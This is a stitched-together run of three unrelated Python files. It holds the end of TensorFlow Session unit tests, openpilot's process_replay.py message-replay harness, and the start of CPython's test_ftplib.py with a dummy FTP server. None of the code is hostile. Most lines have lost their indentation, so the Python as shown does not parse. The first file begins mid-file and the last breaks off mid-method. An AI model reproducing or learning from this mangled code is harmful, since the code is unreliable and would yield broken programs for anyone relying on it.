def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
      self.assertEqual(len(sess.graph_def.node), 1)
      d = constant_op.constant(6.0, name='d')
      self.assertEqual(len(sess.graph_def.node), 2)
      self.assertAllEqual(c.eval(), 5.0)
      self.assertAllEqual(d.eval(), 6.0)
      e = constant_op.constant(7.0, name='e')
      self.assertEqual(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session():
for dtype in [dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64,
dtypes.complex128]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
          elif dtype == dtypes.complex128:
            np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
out_t.eval(feed_dict={feed_t: np_array}))
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
RuntimeError,
'No session factory registered for the given session options.'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, "Cannot interpret feed_dict"):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
        self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(constant_op.constant(1.0), options=None,
run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
        self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
if __name__ == '__main__':
googletest.main()
|
process_replay.py
|
#!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
import signal
from collections import namedtuple
import capnp
from tqdm import tqdm
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from common.timeout import Timeout
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.car.car_helpers import get_car, interfaces
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# NumPy gives different results based on CPU features after version 1.19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
TIMEOUT = 15
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance', 'fake_pubsubmaster', 'submaster_config'], defaults=({},))
def wait_for_event(evt):
if not evt.wait(TIMEOUT):
    if threading.current_thread().name == "MainThread":
      # the tested process likely died; don't let the test hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services, ignore_alive=None, ignore_avg_freq=None):
super().__init__(services, ignore_alive=ignore_alive, ignore_avg_freq=ignore_avg_freq, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super().update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
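# Illustrative sketch only, not used by the harness: documents the lock-step
# handshake implemented by FakeSubMaster/FakePubMaster above. The two helpers
# below are hypothetical; in python_replay_process the "process" side runs in
# a separate thread, just like the real daemon's main().
def _example_process_step(fsm, fpm):
  # process side: update() blocks until the replay loop queues messages,
  # send() blocks until the replay loop collects the published message
  fsm.update()
  fpm.send('carState', messaging.new_message('carState'))
def _example_replay_step(fsm, fpm, cur_time, msgs):
  # replay side: feeding inputs unblocks update(); wait_for_msg() then returns
  # whatever the process published so it can be compared against the log
  fsm.update_msgs(cur_time, msgs)
  return fpm.wait_for_msg()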
def fingerprint(msgs, fsm, can_sock, fingerprint):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock, fingerprint):
if fingerprint:
CarInterface, _, _ = interfaces[fingerprint]
CP = CarInterface.get_params(fingerprint)
else:
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def controlsd_rcv_callback(msg, CP, cfg, fsm):
# no sendcan until controlsd is initialized
socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
if "sendcan" in socks and fsm.frame < 2000:
socks.remove("sendcan")
return socks, len(socks) > 0
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
  # calibrationd publishes one liveCalibration message for every 5 cameraOdometry packets.
  # should_recv is returned true even when nothing is published, so the frame counter still increments
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaStates": [], "peripheralState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "managerState": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=controlsd_rcv_callback,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
submaster_config={'ignore_avg_freq': ['radarState', 'longitudinalPlan']}
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan", "longitudinalPlan"],
"carState": [], "controlsState": [], "radarState": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay", "longitudinalPlan.solverExecutionTime", "lateralPlan.solverExecutionTime"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=False,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
fake_pubsubmaster=False,
),
]
def replay_process(cfg, lr, fingerprint=None):
if cfg.fake_pubsubmaster:
return python_replay_process(cfg, lr, fingerprint)
else:
return cpp_replay_process(cfg, lr, fingerprint)
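# Hypothetical usage sketch, not called anywhere in this module: shows how a
# config from CONFIGS is typically replayed over a logged segment. LogReader
# comes from tools.lib.logreader in openpilot; the log path is a placeholder.
def _example_replay(log_path, proc_name="plannerd"):
  from tools.lib.logreader import LogReader  # assumed available in openpilot
  lr = list(LogReader(log_path))
  cfg = next(c for c in CONFIGS if c.proc_name == proc_name)
  return replay_process(cfg, lr)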
def setup_env():
params = Params()
params.clear_all()
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("Passive", False)
params.put_bool("CommunityFeaturesToggle", True)
os.environ["NO_RADAR_SLEEP"] = "1"
os.environ["REPLAY"] = "1"
def python_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets, **cfg.submaster_config)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
setup_env()
# TODO: remove after getting new route for civic & accord
migration = {
"HONDA CIVIC 2016 TOURING": "HONDA CIVIC 2016",
"HONDA ACCORD 2018 SPORT 2T": "HONDA ACCORD 2018",
"HONDA ACCORD 2T 2018": "HONDA ACCORD 2018",
"Mazda CX-9 2021": "MAZDA CX-9 2021",
}
if fingerprint is not None:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = fingerprint
else:
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = migration.get(msg.carParams.carFingerprint, msg.carParams.carFingerprint)
if len(msg.carParams.carFw) and (car_fingerprint in FW_VERSIONS):
Params().put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock, fingerprint)
CP = car.CarParams.from_bytes(Params().get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs, disable=CI):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(msg.logMonoTime / 1e9, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg().as_builder()
m.logMonoTime = msg.logMonoTime
m = m.as_reader()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
log_msgs = []
setup_env()
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
try:
with Timeout(TIMEOUT):
while not all(pm.all_readers_updated(s) for s in cfg.pub_sub.keys()):
time.sleep(0)
# Make sure all subscribers are connected
sockets = {s: messaging.sub_sock(s, timeout=2000) for s in sub_sockets}
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for i, msg in enumerate(tqdm(pub_msgs, disable=False)):
pm.send(msg.which(), msg.as_builder())
resp_sockets = cfg.pub_sub[msg.which()] if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is None:
print(f"Warning, no response received {i}")
else:
response = response.as_builder()
response.logMonoTime = msg.logMonoTime
response = response.as_reader()
log_msgs.append(response)
if not len(resp_sockets): # We only need to wait if we didn't already wait for a response
while not pm.all_readers_updated(msg.which()):
time.sleep(0)
finally:
managed_processes[cfg.proc_name].signal(signal.SIGKILL)
managed_processes[cfg.proc_name].stop()
return log_msgs
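# Note: python_replay_process runs a Python daemon inside this process via the
# fake SubMaster/PubMaster above, while cpp_replay_process launches the real
# managed process and exchanges messages over actual sockets.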
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
TIMEOUT = 3
# the dummy data returned by the server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
